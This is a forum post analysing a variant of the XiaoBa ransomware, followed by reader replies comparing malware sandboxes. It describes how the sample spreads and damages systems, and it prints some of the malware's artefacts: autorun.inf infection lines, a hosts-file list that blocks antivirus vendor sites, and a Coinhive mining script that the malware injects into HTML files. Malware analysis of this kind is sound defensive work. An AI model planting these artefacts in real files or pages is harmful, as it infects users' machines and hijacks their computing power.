Xiaoba分析简报
本帖最后由 JustPlay 于 2018-6-15 17:58 编辑概述
XiaoBa勒索病毒,是一种新型电脑病毒,是一款国产化水平极高的勒索病毒,主要以邮件,程序木马,网页挂马的形式进行传播。这种病毒利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。倒计时200秒还不缴赎金,被加密的文件就会被全部销毁。以上说明摘自百度百科,但是我分析的这个XiaoBa变种并没有以上行为特征,不过它拥有很强的隐蔽性和感染性,并且具有文件加密,文件删除和挖矿三项主要功能。
样本分析
此样本经过微步云沙箱分析(相关链接请参见《参考链接》),确认为恶意样本
行为简图
权限调整
样本运行之后,首先调整进程权限,确保自己有足够的权限进行后续的操作
路径判断:样本会判断当前的执行路径是否在%systemroot%\360\360Safe\deepscan目录下,如果不在此目录下则拷贝自身到此目录并执行。如果在此路径下,将会首先进行一些修改系统设置相关的操作:
修改文件属性
将文件属性设置为受保护的系统文件,需要在“文件夹和搜索选项”中取消“隐藏受保护的操作系统文件(推荐)”选项才可看到
禁用UAC
设置自启动,创建快捷方式
禁用注册表
不显示隐藏的文
禁用文件夹和搜素选项
创建自启动
删除SafeBoot选项
磁盘遍历
遍历磁盘,在磁盘根目录下创建autorun.inf文件,写入如下数据,尝试进行U盘感染,并且少不了的将此文件设置为隐藏
open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exeshellexecute=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exeshell\Auto\command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exeshell\open=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exeshell\open\Command=RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588\ZhuDongFangYu.exe
创建文件夹RECYCLER\S-5-4-62-7581032776-5377505530-562822366-6588,并且将自身文件拷贝进来重写hosts文件,重定向安全厂商网址
"127.0.0.0 360.qihoo.com""127.0.0.1 qihoo.com""127.0.0.1 www.qihoo.com""127.0.0.1 www.qihoo.cn""127.0.0.1 124.40.51.17""127.0.0.1 58.17.236.92""127.0.0.1 www.kaspersky.com""127.0.0.1 60.210.176.251""127.0.0.1 www.cnnod32.cn""127.0.0.1 www.lanniao.org""127.0.0.1 www.nod32club.com""127.0.0.1 www.dswlab.com""127.0.0.1 bbs.sucop.com""127.0.0.1 www.virustotal.com""127.0.0.1 tool.ikaka.com""127.0.0.1 www.jiangmin.com""127.0.0.1 www.duba.net""127.0.0.1 www.eset.com.cn""127.0.0.1 www.nod32.com""127.0.0.1 shadu.duba.net""127.0.0.1 union.kingsoft.com""127.0.0.1www.kaspersky.com.cn""127.0.0.1 kaspersky.com.cn""127.0.0.1 virustotal.com""127.0.0.1 www.360.cn""127.0.0.1 www.360safe.cn""127.0.0.1 www.360safe.com""127.0.0.1 www.chinakv.com""127.0.0.1 www.rising.com.cn""127.0.0.1 rising.com.cn""127.0.0.1 dl.jiangmin.com""127.0.0.1 jiangmin.com",
正题
最后创建线程,在线程函数中,XiaoBa会遍历所有文件,查找扩展名为.exe,.com,.scr,.pif,.html,.htm,.gho,.iso的文件,针对不同的扩展名执行不同的操作
.exe,.com,.scr,.pif
重写这些文件,将自身文件写入这些文件的开头,后期如果再运行这些文件的话,就会运行ZhuDongFangYu.exe.
html,.htm
在这些文件的末尾添加挖矿脚本
"\r\n""<scripttype=\"text/javascript\"src=\"https://coinhive.com/lib/coinhive.min.js\"></script>\r\n""<script>\r\n""var miner = newCoinHive.Anonymous('yuNWeGn9GWL72dONBX9WNEj1aVHxg49E');\r\n""miner.start();\r\n""</script>"
.gho,.iso
对于这些文件,直接删除
一个有意思的点是这个样本的图标是360杀毒的图标,创建的文件夹名也是360,而且经过它重写的可执行程序的图标都换成了360的图标,奇虎的人怎么看。
参考链接
https://s.threatbook.cn/report/win7_sp1_enx86_office2013/11abb44de53807e32980a010a473514694f901841e63ab33f5e0ff8754009b47/?sign=history&utm_campaign=52pj&utm_medium=tz&utm_source=Adconly&gio_link_id=L9GkJ796 奇虎的人 坐着看。 JustPlay 发表于 2018-6-16 09:29
哈勃隐藏分析行为,看不到,不如微步这个好点,重要是免费啊,还能下载一些样本
腾讯哈勃可以申请高级vip免费的,就可以看行为了 奇虎的人 坐着看电脑 不知道为什么,编辑时的界面和发表后的界面不一样,正常情况是到参考链接文章就完了,大家将就一下把{:1_937:} 虎的人 坐着看电脑 吾爱破解论坛因你更精彩! :lol咋不用腾讯哈勃???
奇虎的人 手忙脚乱 chenjingyes 发表于 2018-6-16 00:46
咋不用腾讯哈勃???
哈勃隐藏分析行为,看不到,不如微步这个好点,重要是免费啊,还能下载一些样本 好复杂,回头再看看